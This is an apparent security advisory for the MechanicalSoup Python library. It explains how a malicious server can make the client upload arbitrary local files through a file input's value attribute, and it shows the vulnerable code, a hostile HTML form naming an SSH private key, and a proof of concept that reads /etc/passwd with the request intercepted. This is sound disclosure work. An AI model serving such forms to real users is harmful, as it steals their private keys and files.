Summary
A malicious web server can read arbitrary files on the client using a <input type="file" ...> inside HTML form.
Details
This affects the extremely common pattern of form submission:
b = mechanicalsoup.StatefulBrowser()
b.select_form(...)
b.submit_selected()
The problem is with the code in browser.Browser.get_request_kwargs:
if tag.get("type", "").lower() == "file" and multipart:
filepath = value
if filepath != "" and isinstance(filepath, str):
content = open(filepath, "rb")
else:
content = ""
filename = os.path.basename(filepath)
# If value is the empty string, we still pass it
# for consistency with browsers (see
# https://github.com/MechanicalSoup/MechanicalSoup/issues/250).
files[name] = (filename, content)
The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:
<html><body>
<form method="post" enctype="multipart/form-data">
<input type="text" name="greeting" value="hello" />
<input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
</form>
</body></html>
then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
PoC
import attr
import mechanicalsoup
import requests
class NevermindError(Exception):
pass
@attr.s
class FakeSession:
session = attr.ib()
headers = property(lambda self: self.session.headers)
def request(self, *args, **kwargs):
print("requested", args, kwargs)
raise NevermindError # don't actually send request
def demonstrate(inputs=None):
b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session()))
b.open_fake_page("""\
<html><body>
<form method="post" enctype="multipart/form-data">
<input type="text" name="greeting" value="hello" />
<input type="file" name="evil" value="/etc/passwd" />
<input type="file" name="second" />
</form>
</body></html>
""", url="http://127.0.0.1:9/")
b.select_form()
if inputs is not None:
b.form.set_input(inputs)
try:
b.submit_selected()
except NevermindError:
pass
# %%
# unpatched
demonstrate()
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('passwd', <_io.BufferedReader name='/etc/passwd'>), 'second': ('', '')}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hello')]}
# %%
# with the patch, this now works. users MUST open the file manually and
# use browser.set_input() using the file object.
demonstrate({"greeting": "hiya", "evil": open("/etc/hostname", "rb").name, "second": open("/dev/null", "rb")})
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('hostname', <_io.BufferedReader name='/etc/hostname'>), 'second': ('null', <_io.BufferedReader name='/dev/null'>)}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hiya')]}
# %%
# with the patch, this raises a ValueError with a helpful string
demonstrate({"evil": "/etc/hostname"})
# %%
# with the patch, we silently send no file if a malicious server tries the attack:
demonstrate()